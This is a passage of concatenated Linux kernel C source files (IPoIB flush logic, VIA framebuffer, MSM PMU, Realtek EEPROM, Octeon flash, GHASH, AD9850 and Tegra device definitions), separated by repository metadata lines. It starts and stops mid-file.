if (test_and_set_bit(IPOIB_PKEY_ASSIGNED, &priv->flags) &&
new_index == priv->pkey_index) {
ipoib_dbg(priv, "Not flushing - P_Key index not changed.\n");
return;
}
priv->pkey_index = new_index;
}
if (level == IPOIB_FLUSH_LIGHT) {
ipoib_mark_paths_invalid(dev);
ipoib_mcast_dev_flush(dev);
}
if (level >= IPOIB_FLUSH_NORMAL)
ipoib_ib_dev_down(dev, 0);
if (level == IPOIB_FLUSH_HEAVY) {
ipoib_ib_dev_stop(dev, 0);
ipoib_ib_dev_open(dev);
}
/*
* The device could have been brought down between the start and when
* we get here, don't bring it back up if it's not configured up
*/
if (test_bit(IPOIB_FLAG_ADMIN_UP, &priv->flags)) {
if (level >= IPOIB_FLUSH_NORMAL)
ipoib_ib_dev_up(dev);
ipoib_mcast_restart_task(&priv->restart_task);
}
}
void ipoib_ib_dev_flush_light(struct work_struct *work)
{
struct ipoib_dev_priv *priv =
container_of(work, struct ipoib_dev_priv, flush_light);
__ipoib_ib_dev_flush(priv, IPOIB_FLUSH_LIGHT);
}
void ipoib_ib_dev_flush_normal(struct work_struct *work)
{
struct ipoib_dev_priv *priv =
container_of(work, struct ipoib_dev_priv, flush_normal);
__ipoib_ib_dev_flush(priv, IPOIB_FLUSH_NORMAL);
}
void ipoib_ib_dev_flush_heavy(struct work_struct *work)
{
struct ipoib_dev_priv *priv =
container_of(work, struct ipoib_dev_priv, flush_heavy);
__ipoib_ib_dev_flush(priv, IPOIB_FLUSH_HEAVY);
}
void ipoib_ib_dev_cleanup(struct net_device *dev)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
ipoib_dbg(priv, "cleaning up ib_dev\n");
ipoib_mcast_stop_thread(dev, 1);
ipoib_mcast_dev_flush(dev);
ipoib_transport_dev_cleanup(dev);
}
/*
* Delayed P_Key Assigment Interim Support
*
* The following is initial implementation of delayed P_Key assigment
* mechanism. It is using the same approach implemented for the multicast
* group join. The single goal of this implementation is to quickly address
* Bug #2507. This implementation will probably be removed when the P_Key
* change async notification is available.
*/
void ipoib_pkey_poll(struct work_struct *work)
{
struct ipoib_dev_priv *priv =
container_of(work, struct ipoib_dev_priv, pkey_poll_task.work);
struct net_device *dev = priv->dev;
ipoib_pkey_dev_check_presence(dev);
if (test_bit(IPOIB_PKEY_ASSIGNED, &priv->flags))
ipoib_open(dev);
else {
mutex_lock(&pkey_mutex);
if (!test_bit(IPOIB_PKEY_STOP, &priv->flags))
queue_delayed_work(ipoib_workqueue,
&priv->pkey_poll_task,
HZ);
mutex_unlock(&pkey_mutex);
}
}
int ipoib_pkey_dev_delay_open(struct net_device *dev)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
/* Look for the interface pkey value in the IB Port P_Key table and */
/* set the interface pkey assigment flag */
ipoib_pkey_dev_check_presence(dev);
/* P_Key value not assigned yet - start polling */
if (!test_bit(IPOIB_PKEY_ASSIGNED, &priv->flags)) {
mutex_lock(&pkey_mutex);
clear_bit(IPOIB_PKEY_STOP, &priv->flags);
queue_delayed_work(ipoib_workqueue,
&priv->pkey_poll_task,
HZ);
mutex_unlock(&pkey_mutex);
return 1;
}
return 0;
}
| gpl-2.0 |
RonGokhale/lge-kernel-pecan | drivers/video/via/iface.c | 772 | 2290 | /*
* Copyright 1998-2008 VIA Technologies, Inc. All Rights Reserved.
* Copyright 2001-2008 S3 Graphics, Inc. All Rights Reserved.
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public
* License as published by the Free Software Foundation;
* either version 2, or (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTIES OR REPRESENTATIONS; without even
* the implied warranty of MERCHANTABILITY or FITNESS FOR
* A PARTICULAR PURPOSE.See the GNU General Public License
* for more details.
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc.,
* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*/
#include "global.h"
/* Get frame buffer size from VGA BIOS */
unsigned int viafb_get_memsize(void)
{
unsigned int m;
/* If memory size provided by user */
if (viafb_memsize)
m = viafb_memsize * Mb;
else {
m = (unsigned int)viafb_read_reg(VIASR, SR39);
m = m * (4 * Mb);
if ((m < (16 * Mb)) || (m > (64 * Mb)))
m = 16 * Mb;
}
DEBUG_MSG(KERN_INFO "framebuffer size = %d Mb\n", m / Mb);
return m;
}
/* Get Video Buffer Starting Physical Address(back door)*/
unsigned long viafb_get_videobuf_addr(void)
{
struct pci_dev *pdev = NULL;
unsigned char sys_mem;
unsigned char video_mem;
unsigned long sys_mem_size;
unsigned long video_mem_size;
/*system memory = 256 MB, video memory 64 MB */
unsigned long vmem_starting_adr = 0x0C000000;
pdev =
(struct pci_dev *)pci_get_device(VIA_K800_BRIDGE_VID,
VIA_K800_BRIDGE_DID, NULL);
if (pdev != NULL) {
pci_read_config_byte(pdev, VIA_K800_SYSTEM_MEMORY_REG,
&sys_mem);
pci_read_config_byte(pdev, VIA_K800_VIDEO_MEMORY_REG,
&video_mem);
video_mem = (video_mem & 0x70) >> 4;
sys_mem_size = ((unsigned long)sys_mem) << 24;
if (video_mem != 0)
video_mem_size = (1 << (video_mem)) * 1024 * 1024;
else
video_mem_size = 0;
vmem_starting_adr = sys_mem_size - video_mem_size;
pci_dev_put(pdev);
}
DEBUG_MSG(KERN_INFO "Video Memory Starting Address = %lx \n",
vmem_starting_adr);
return vmem_starting_adr;
}
| gpl-2.0 |
Ca1ne/Enoch213 | arch/arm/mach-msm/pmu.c | 772 | 1494 | /* Copyright (c) 2010-2011, Code Aurora Forum. All rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 and
* only version 2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
#include <linux/platform_device.h>
#include <asm/pmu.h>
#include <mach/irqs.h>
static struct resource cpu_pmu_resource = {
.start = INT_ARMQC_PERFMON,
.end = INT_ARMQC_PERFMON,
.flags = IORESOURCE_IRQ,
};
#ifdef CONFIG_CPU_HAS_L2_PMU
static struct resource l2_pmu_resource = {
.start = SC_SICL2PERFMONIRPTREQ,
.end = SC_SICL2PERFMONIRPTREQ,
.flags = IORESOURCE_IRQ,
};
static struct platform_device l2_pmu_device = {
.name = "l2-arm-pmu",
.id = ARM_PMU_DEVICE_L2,
.resource = &l2_pmu_resource,
.num_resources = 1,
};
#endif
static struct platform_device cpu_pmu_device = {
.name = "cpu-arm-pmu",
.id = ARM_PMU_DEVICE_CPU,
.resource = &cpu_pmu_resource,
.num_resources = 1,
};
static struct platform_device *pmu_devices[] = {
&cpu_pmu_device,
#ifdef CONFIG_CPU_HAS_L2_PMU
&l2_pmu_device,
#endif
};
static int __init msm_pmu_init(void)
{
return platform_add_devices(pmu_devices, ARRAY_SIZE(pmu_devices));
}
arch_initcall(msm_pmu_init);
| gpl-2.0 |
akca/android_kernel_xiaomi_msm8996 | drivers/staging/rtl8192e/rtl8192e/rtl_eeprom.c | 1540 | 3665 | /******************************************************************************
* Copyright(c) 2008 - 2010 Realtek Corporation. All rights reserved.
*
* Based on the r8180 driver, which is:
* Copyright 2004-2005 Andrea Merello <andrea.merello@gmail.com>, et al.
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along with
* this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110, USA
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <wlanfae@realtek.com>
******************************************************************************/
#include "rtl_core.h"
#include "rtl_eeprom.h"
static void eprom_cs(struct net_device *dev, short bit)
{
if (bit)
write_nic_byte(dev, EPROM_CMD,
(1 << EPROM_CS_SHIFT) |
read_nic_byte(dev, EPROM_CMD));
else
write_nic_byte(dev, EPROM_CMD, read_nic_byte(dev, EPROM_CMD)
& ~(1<<EPROM_CS_SHIFT));
udelay(EPROM_DELAY);
}
static void eprom_ck_cycle(struct net_device *dev)
{
write_nic_byte(dev, EPROM_CMD,
(1<<EPROM_CK_SHIFT) | read_nic_byte(dev, EPROM_CMD));
udelay(EPROM_DELAY);
write_nic_byte(dev, EPROM_CMD,
read_nic_byte(dev, EPROM_CMD) & ~(1<<EPROM_CK_SHIFT));
udelay(EPROM_DELAY);
}
static void eprom_w(struct net_device *dev, short bit)
{
if (bit)
write_nic_byte(dev, EPROM_CMD, (1<<EPROM_W_SHIFT) |
read_nic_byte(dev, EPROM_CMD));
else
write_nic_byte(dev, EPROM_CMD, read_nic_byte(dev, EPROM_CMD)
& ~(1<<EPROM_W_SHIFT));
udelay(EPROM_DELAY);
}
static short eprom_r(struct net_device *dev)
{
short bit;
bit = (read_nic_byte(dev, EPROM_CMD) & (1<<EPROM_R_SHIFT));
udelay(EPROM_DELAY);
if (bit)
return 1;
return 0;
}
static void eprom_send_bits_string(struct net_device *dev, short b[], int len)
{
int i;
for (i = 0; i < len; i++) {
eprom_w(dev, b[i]);
eprom_ck_cycle(dev);
}
}
u32 eprom_read(struct net_device *dev, u32 addr)
{
struct r8192_priv *priv = rtllib_priv(dev);
short read_cmd[] = {1, 1, 0};
short addr_str[8];
int i;
int addr_len;
u32 ret;
ret = 0;
write_nic_byte(dev, EPROM_CMD,
(EPROM_CMD_PROGRAM << EPROM_CMD_OPERATING_MODE_SHIFT));
udelay(EPROM_DELAY);
if (priv->epromtype == EEPROM_93C56) {
addr_str[7] = addr & 1;
addr_str[6] = addr & (1<<1);
addr_str[5] = addr & (1<<2);
addr_str[4] = addr & (1<<3);
addr_str[3] = addr & (1<<4);
addr_str[2] = addr & (1<<5);
addr_str[1] = addr & (1<<6);
addr_str[0] = addr & (1<<7);
addr_len = 8;
} else {
addr_str[5] = addr & 1;
addr_str[4] = addr & (1<<1);
addr_str[3] = addr & (1<<2);
addr_str[2] = addr & (1<<3);
addr_str[1] = addr & (1<<4);
addr_str[0] = addr & (1<<5);
addr_len = 6;
}
eprom_cs(dev, 1);
eprom_ck_cycle(dev);
eprom_send_bits_string(dev, read_cmd, 3);
eprom_send_bits_string(dev, addr_str, addr_len);
eprom_w(dev, 0);
for (i = 0; i < 16; i++) {
eprom_ck_cycle(dev);
ret |= (eprom_r(dev)<<(15-i));
}
eprom_cs(dev, 0);
eprom_ck_cycle(dev);
write_nic_byte(dev, EPROM_CMD,
(EPROM_CMD_NORMAL<<EPROM_CMD_OPERATING_MODE_SHIFT));
return ret;
}
| gpl-2.0 |
denggww123/EmbedSky-linux-2.6.30.4 | arch/mips/cavium-octeon/flash_setup.c | 1796 | 2184 | /*
* Octeon Bootbus flash setup
*
* This file is subject to the terms and conditions of the GNU General Public
* License. See the file "COPYING" in the main directory of this archive
* for more details.
*
* Copyright (C) 2007, 2008 Cavium Networks
*/
#include <linux/kernel.h>
#include <linux/mtd/mtd.h>
#include <linux/mtd/map.h>
#include <linux/mtd/partitions.h>
#include <asm/octeon/octeon.h>
static struct map_info flash_map;
static struct mtd_info *mymtd;
#ifdef CONFIG_MTD_PARTITIONS
static int nr_parts;
static struct mtd_partition *parts;
static const char *part_probe_types[] = {
"cmdlinepart",
#ifdef CONFIG_MTD_REDBOOT_PARTS
"RedBoot",
#endif
NULL
};
#endif
/**
* Module/ driver initialization.
*
* Returns Zero on success
*/
static int __init flash_init(void)
{
/*
* Read the bootbus region 0 setup to determine the base
* address of the flash.
*/
union cvmx_mio_boot_reg_cfgx region_cfg;
region_cfg.u64 = cvmx_read_csr(CVMX_MIO_BOOT_REG_CFGX(0));
if (region_cfg.s.en) {
/*
* The bootloader always takes the flash and sets its
* address so the entire flash fits below
* 0x1fc00000. This way the flash aliases to
* 0x1fc00000 for booting. Software can access the
* full flash at the true address, while core boot can
* access 4MB.
*/
/* Use this name so old part lines work */
flash_map.name = "phys_mapped_flash";
flash_map.phys = region_cfg.s.base << 16;
flash_map.size = 0x1fc00000 - flash_map.phys;
flash_map.bankwidth = 1;
flash_map.virt = ioremap(flash_map.phys, flash_map.size);
pr_notice("Bootbus flash: Setting flash for %luMB flash at "
"0x%08llx\n", flash_map.size >> 20, flash_map.phys);
simple_map_init(&flash_map);
mymtd = do_map_probe("cfi_probe", &flash_map);
if (mymtd) {
mymtd->owner = THIS_MODULE;
#ifdef CONFIG_MTD_PARTITIONS
nr_parts = parse_mtd_partitions(mymtd,
part_probe_types,
&parts, 0);
if (nr_parts > 0)
add_mtd_partitions(mymtd, parts, nr_parts);
else
add_mtd_device(mymtd);
#else
add_mtd_device(mymtd);
#endif
} else {
pr_err("Failed to register MTD device for flash\n");
}
}
return 0;
}
late_initcall(flash_init);
| gpl-2.0 |
yasker/linux | crypto/ghash-generic.c | 2052 | 3836 | /*
* GHASH: digest algorithm for GCM (Galois/Counter Mode).
*
* Copyright (c) 2007 Nokia Siemens Networks - Mikko Herranen <mh1@iki.fi>
* Copyright (c) 2009 Intel Corp.
* Author: Huang Ying <ying.huang@intel.com>
*
* The algorithm implementation is copied from gcm.c.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation.
*/
#include <crypto/algapi.h>
#include <crypto/gf128mul.h>
#include <crypto/internal/hash.h>
#include <linux/crypto.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#define GHASH_BLOCK_SIZE 16
#define GHASH_DIGEST_SIZE 16
struct ghash_ctx {
struct gf128mul_4k *gf128;
};
struct ghash_desc_ctx {
u8 buffer[GHASH_BLOCK_SIZE];
u32 bytes;
};
static int ghash_init(struct shash_desc *desc)
{
struct ghash_desc_ctx *dctx = shash_desc_ctx(desc);
memset(dctx, 0, sizeof(*dctx));
return 0;
}
static int ghash_setkey(struct crypto_shash *tfm,
const u8 *key, unsigned int keylen)
{
struct ghash_ctx *ctx = crypto_shash_ctx(tfm);
if (keylen != GHASH_BLOCK_SIZE) {
crypto_shash_set_flags(tfm, CRYPTO_TFM_RES_BAD_KEY_LEN);
return -EINVAL;
}
if (ctx->gf128)
gf128mul_free_4k(ctx->gf128);
ctx->gf128 = gf128mul_init_4k_lle((be128 *)key);
if (!ctx->gf128)
return -ENOMEM;
return 0;
}
static int ghash_update(struct shash_desc *desc,
const u8 *src, unsigned int srclen)
{
struct ghash_desc_ctx *dctx = shash_desc_ctx(desc);
struct ghash_ctx *ctx = crypto_shash_ctx(desc->tfm);
u8 *dst = dctx->buffer;
if (!ctx->gf128)
return -ENOKEY;
if (dctx->bytes) {
int n = min(srclen, dctx->bytes);
u8 *pos = dst + (GHASH_BLOCK_SIZE - dctx->bytes);
dctx->bytes -= n;
srclen -= n;
while (n--)
*pos++ ^= *src++;
if (!dctx->bytes)
gf128mul_4k_lle((be128 *)dst, ctx->gf128);
}
while (srclen >= GHASH_BLOCK_SIZE) {
crypto_xor(dst, src, GHASH_BLOCK_SIZE);
gf128mul_4k_lle((be128 *)dst, ctx->gf128);
src += GHASH_BLOCK_SIZE;
srclen -= GHASH_BLOCK_SIZE;
}
if (srclen) {
dctx->bytes = GHASH_BLOCK_SIZE - srclen;
while (srclen--)
*dst++ ^= *src++;
}
return 0;
}
static void ghash_flush(struct ghash_ctx *ctx, struct ghash_desc_ctx *dctx)
{
u8 *dst = dctx->buffer;
if (dctx->bytes) {
u8 *tmp = dst + (GHASH_BLOCK_SIZE - dctx->bytes);
while (dctx->bytes--)
*tmp++ ^= 0;
gf128mul_4k_lle((be128 *)dst, ctx->gf128);
}
dctx->bytes = 0;
}
static int ghash_final(struct shash_desc *desc, u8 *dst)
{
struct ghash_desc_ctx *dctx = shash_desc_ctx(desc);
struct ghash_ctx *ctx = crypto_shash_ctx(desc->tfm);
u8 *buf = dctx->buffer;
if (!ctx->gf128)
return -ENOKEY;
ghash_flush(ctx, dctx);
memcpy(dst, buf, GHASH_BLOCK_SIZE);
return 0;
}
static void ghash_exit_tfm(struct crypto_tfm *tfm)
{
struct ghash_ctx *ctx = crypto_tfm_ctx(tfm);
if (ctx->gf128)
gf128mul_free_4k(ctx->gf128);
}
static struct shash_alg ghash_alg = {
.digestsize = GHASH_DIGEST_SIZE,
.init = ghash_init,
.update = ghash_update,
.final = ghash_final,
.setkey = ghash_setkey,
.descsize = sizeof(struct ghash_desc_ctx),
.base = {
.cra_name = "ghash",
.cra_driver_name = "ghash-generic",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_SHASH,
.cra_blocksize = GHASH_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct ghash_ctx),
.cra_module = THIS_MODULE,
.cra_exit = ghash_exit_tfm,
},
};
static int __init ghash_mod_init(void)
{
return crypto_register_shash(&ghash_alg);
}
static void __exit ghash_mod_exit(void)
{
crypto_unregister_shash(&ghash_alg);
}
module_init(ghash_mod_init);
module_exit(ghash_mod_exit);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("GHASH Message Digest Algorithm");
MODULE_ALIAS_CRYPTO("ghash");
MODULE_ALIAS_CRYPTO("ghash-generic");
| gpl-2.0 |
javilonas/Lonas_KL-GT-I9300-OMNI | drivers/staging/iio/dds/ad9850.c | 2308 | 3238 | /*
* Driver for ADI Direct Digital Synthesis ad9850
*
* Copyright (c) 2010-2010 Analog Devices Inc.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
*/
#include <linux/types.h>
#include <linux/mutex.h>
#include <linux/device.h>
#include <linux/spi/spi.h>
#include <linux/slab.h>
#include <linux/sysfs.h>
#include "../iio.h"
#include "../sysfs.h"
#define DRV_NAME "ad9850"
#define value_mask (u16)0xf000
#define addr_shift 12
/* Register format: 4 bits addr + 12 bits value */
struct ad9850_config {
u8 control[5];
};
struct ad9850_state {
struct mutex lock;
struct iio_dev *idev;
struct spi_device *sdev;
};
static ssize_t ad9850_set_parameter(struct device *dev,
struct device_attribute *attr,
const char *buf,
size_t len)
{
struct spi_message msg;
struct spi_transfer xfer;
int ret;
struct ad9850_config *config = (struct ad9850_config *)buf;
struct iio_dev *idev = dev_get_drvdata(dev);
struct ad9850_state *st = idev->dev_data;
xfer.len = len;
xfer.tx_buf = config;
mutex_lock(&st->lock);
spi_message_init(&msg);
spi_message_add_tail(&xfer, &msg);
ret = spi_sync(st->sdev, &msg);
if (ret)
goto error_ret;
error_ret:
mutex_unlock(&st->lock);
return ret ? ret : len;
}
static IIO_DEVICE_ATTR(dds, S_IWUSR, NULL, ad9850_set_parameter, 0);
static struct attribute *ad9850_attributes[] = {
&iio_dev_attr_dds.dev_attr.attr,
NULL,
};
static const struct attribute_group ad9850_attribute_group = {
.name = DRV_NAME,
.attrs = ad9850_attributes,
};
static const struct iio_info ad9850_info = {
.attrs = &ad9850_attribute_group,
.driver_module = THIS_MODULE,
};
static int __devinit ad9850_probe(struct spi_device *spi)
{
struct ad9850_state *st;
int ret = 0;
st = kzalloc(sizeof(*st), GFP_KERNEL);
if (st == NULL) {
ret = -ENOMEM;
goto error_ret;
}
spi_set_drvdata(spi, st);
mutex_init(&st->lock);
st->sdev = spi;
st->idev = iio_allocate_device(0);
if (st->idev == NULL) {
ret = -ENOMEM;
goto error_free_st;
}
st->idev->dev.parent = &spi->dev;
st->idev->info = &ad9850_info;
st->idev->dev_data = (void *)(st);
st->idev->modes = INDIO_DIRECT_MODE;
ret = iio_device_register(st->idev);
if (ret)
goto error_free_dev;
spi->max_speed_hz = 2000000;
spi->mode = SPI_MODE_3;
spi->bits_per_word = 16;
spi_setup(spi);
return 0;
error_free_dev:
iio_free_device(st->idev);
error_free_st:
kfree(st);
error_ret:
return ret;
}
static int __devexit ad9850_remove(struct spi_device *spi)
{
struct ad9850_state *st = spi_get_drvdata(spi);
iio_device_unregister(st->idev);
kfree(st);
return 0;
}
static struct spi_driver ad9850_driver = {
.driver = {
.name = DRV_NAME,
.owner = THIS_MODULE,
},
.probe = ad9850_probe,
.remove = __devexit_p(ad9850_remove),
};
static __init int ad9850_spi_init(void)
{
return spi_register_driver(&ad9850_driver);
}
module_init(ad9850_spi_init);
static __exit void ad9850_spi_exit(void)
{
spi_unregister_driver(&ad9850_driver);
}
module_exit(ad9850_spi_exit);
MODULE_AUTHOR("Cliff Cai");
MODULE_DESCRIPTION("Analog Devices ad9850 driver");
MODULE_LICENSE("GPL v2");
| gpl-2.0 |
1DeMaCr/android_hd_kernel_samsung_codina | arch/arm/mach-tegra/devices.c | 2308 | 12034 | /*
* Copyright (C) 2010,2011 Google, Inc.
*
* Author:
* Colin Cross <ccross@android.com>
* Erik Gilling <ccross@android.com>
*
* This software is licensed under the terms of the GNU General Public
* License version 2, as published by the Free Software Foundation, and
* may be copied, distributed, and modified under those terms.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
*/
#include <linux/resource.h>
#include <linux/platform_device.h>
#include <linux/dma-mapping.h>
#include <linux/fsl_devices.h>
#include <linux/serial_8250.h>
#include <asm/pmu.h>
#include <mach/irqs.h>
#include <mach/iomap.h>
#include <mach/dma.h>
static struct resource i2c_resource1[] = {
[0] = {
.start = INT_I2C,
.end = INT_I2C,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_I2C_BASE,
.end = TEGRA_I2C_BASE + TEGRA_I2C_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
static struct resource i2c_resource2[] = {
[0] = {
.start = INT_I2C2,
.end = INT_I2C2,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_I2C2_BASE,
.end = TEGRA_I2C2_BASE + TEGRA_I2C2_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
static struct resource i2c_resource3[] = {
[0] = {
.start = INT_I2C3,
.end = INT_I2C3,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_I2C3_BASE,
.end = TEGRA_I2C3_BASE + TEGRA_I2C3_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
static struct resource i2c_resource4[] = {
[0] = {
.start = INT_DVC,
.end = INT_DVC,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_DVC_BASE,
.end = TEGRA_DVC_BASE + TEGRA_DVC_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device tegra_i2c_device1 = {
.name = "tegra-i2c",
.id = 0,
.resource = i2c_resource1,
.num_resources = ARRAY_SIZE(i2c_resource1),
.dev = {
.platform_data = 0,
},
};
struct platform_device tegra_i2c_device2 = {
.name = "tegra-i2c",
.id = 1,
.resource = i2c_resource2,
.num_resources = ARRAY_SIZE(i2c_resource2),
.dev = {
.platform_data = 0,
},
};
struct platform_device tegra_i2c_device3 = {
.name = "tegra-i2c",
.id = 2,
.resource = i2c_resource3,
.num_resources = ARRAY_SIZE(i2c_resource3),
.dev = {
.platform_data = 0,
},
};
struct platform_device tegra_i2c_device4 = {
.name = "tegra-i2c",
.id = 3,
.resource = i2c_resource4,
.num_resources = ARRAY_SIZE(i2c_resource4),
.dev = {
.platform_data = 0,
},
};
static struct resource spi_resource1[] = {
[0] = {
.start = INT_S_LINK1,
.end = INT_S_LINK1,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_SPI1_BASE,
.end = TEGRA_SPI1_BASE + TEGRA_SPI1_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
static struct resource spi_resource2[] = {
[0] = {
.start = INT_SPI_2,
.end = INT_SPI_2,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_SPI2_BASE,
.end = TEGRA_SPI2_BASE + TEGRA_SPI2_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
static struct resource spi_resource3[] = {
[0] = {
.start = INT_SPI_3,
.end = INT_SPI_3,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_SPI3_BASE,
.end = TEGRA_SPI3_BASE + TEGRA_SPI3_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
static struct resource spi_resource4[] = {
[0] = {
.start = INT_SPI_4,
.end = INT_SPI_4,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_SPI4_BASE,
.end = TEGRA_SPI4_BASE + TEGRA_SPI4_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device tegra_spi_device1 = {
.name = "spi_tegra",
.id = 0,
.resource = spi_resource1,
.num_resources = ARRAY_SIZE(spi_resource1),
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
struct platform_device tegra_spi_device2 = {
.name = "spi_tegra",
.id = 1,
.resource = spi_resource2,
.num_resources = ARRAY_SIZE(spi_resource2),
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
struct platform_device tegra_spi_device3 = {
.name = "spi_tegra",
.id = 2,
.resource = spi_resource3,
.num_resources = ARRAY_SIZE(spi_resource3),
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
struct platform_device tegra_spi_device4 = {
.name = "spi_tegra",
.id = 3,
.resource = spi_resource4,
.num_resources = ARRAY_SIZE(spi_resource4),
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
static struct resource sdhci_resource1[] = {
[0] = {
.start = INT_SDMMC1,
.end = INT_SDMMC1,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_SDMMC1_BASE,
.end = TEGRA_SDMMC1_BASE + TEGRA_SDMMC1_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
static struct resource sdhci_resource2[] = {
[0] = {
.start = INT_SDMMC2,
.end = INT_SDMMC2,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_SDMMC2_BASE,
.end = TEGRA_SDMMC2_BASE + TEGRA_SDMMC2_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
static struct resource sdhci_resource3[] = {
[0] = {
.start = INT_SDMMC3,
.end = INT_SDMMC3,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_SDMMC3_BASE,
.end = TEGRA_SDMMC3_BASE + TEGRA_SDMMC3_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
static struct resource sdhci_resource4[] = {
[0] = {
.start = INT_SDMMC4,
.end = INT_SDMMC4,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = TEGRA_SDMMC4_BASE,
.end = TEGRA_SDMMC4_BASE + TEGRA_SDMMC4_SIZE-1,
.flags = IORESOURCE_MEM,
},
};
/* board files should fill in platform_data register the devices themselvs.
* See board-harmony.c for an example
*/
struct platform_device tegra_sdhci_device1 = {
.name = "sdhci-tegra",
.id = 0,
.resource = sdhci_resource1,
.num_resources = ARRAY_SIZE(sdhci_resource1),
};
struct platform_device tegra_sdhci_device2 = {
.name = "sdhci-tegra",
.id = 1,
.resource = sdhci_resource2,
.num_resources = ARRAY_SIZE(sdhci_resource2),
};
struct platform_device tegra_sdhci_device3 = {
.name = "sdhci-tegra",
.id = 2,
.resource = sdhci_resource3,
.num_resources = ARRAY_SIZE(sdhci_resource3),
};
struct platform_device tegra_sdhci_device4 = {
.name = "sdhci-tegra",
.id = 3,
.resource = sdhci_resource4,
.num_resources = ARRAY_SIZE(sdhci_resource4),
};
static struct resource tegra_usb1_resources[] = {
[0] = {
.start = TEGRA_USB_BASE,
.end = TEGRA_USB_BASE + TEGRA_USB_SIZE - 1,
.flags = IORESOURCE_MEM,
},
[1] = {
.start = INT_USB,
.end = INT_USB,
.flags = IORESOURCE_IRQ,
},
};
static struct resource tegra_usb2_resources[] = {
[0] = {
.start = TEGRA_USB2_BASE,
.end = TEGRA_USB2_BASE + TEGRA_USB2_SIZE - 1,
.flags = IORESOURCE_MEM,
},
[1] = {
.start = INT_USB2,
.end = INT_USB2,
.flags = IORESOURCE_IRQ,
},
};
static struct resource tegra_usb3_resources[] = {
[0] = {
.start = TEGRA_USB3_BASE,
.end = TEGRA_USB3_BASE + TEGRA_USB3_SIZE - 1,
.flags = IORESOURCE_MEM,
},
[1] = {
.start = INT_USB3,
.end = INT_USB3,
.flags = IORESOURCE_IRQ,
},
};
static u64 tegra_ehci_dmamask = DMA_BIT_MASK(32);
struct platform_device tegra_ehci1_device = {
.name = "tegra-ehci",
.id = 0,
.dev = {
.dma_mask = &tegra_ehci_dmamask,
.coherent_dma_mask = DMA_BIT_MASK(32),
},
.resource = tegra_usb1_resources,
.num_resources = ARRAY_SIZE(tegra_usb1_resources),
};
struct platform_device tegra_ehci2_device = {
.name = "tegra-ehci",
.id = 1,
.dev = {
.dma_mask = &tegra_ehci_dmamask,
.coherent_dma_mask = DMA_BIT_MASK(32),
},
.resource = tegra_usb2_resources,
.num_resources = ARRAY_SIZE(tegra_usb2_resources),
};
struct platform_device tegra_ehci3_device = {
.name = "tegra-ehci",
.id = 2,
.dev = {
.dma_mask = &tegra_ehci_dmamask,
.coherent_dma_mask = DMA_BIT_MASK(32),
},
.resource = tegra_usb3_resources,
.num_resources = ARRAY_SIZE(tegra_usb3_resources),
};
static struct resource tegra_pmu_resources[] = {
[0] = {
.start = INT_CPU0_PMU_INTR,
.end = INT_CPU0_PMU_INTR,
.flags = IORESOURCE_IRQ,
},
[1] = {
.start = INT_CPU1_PMU_INTR,
.end = INT_CPU1_PMU_INTR,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device tegra_pmu_device = {
.name = "arm-pmu",
.id = ARM_PMU_DEVICE_CPU,
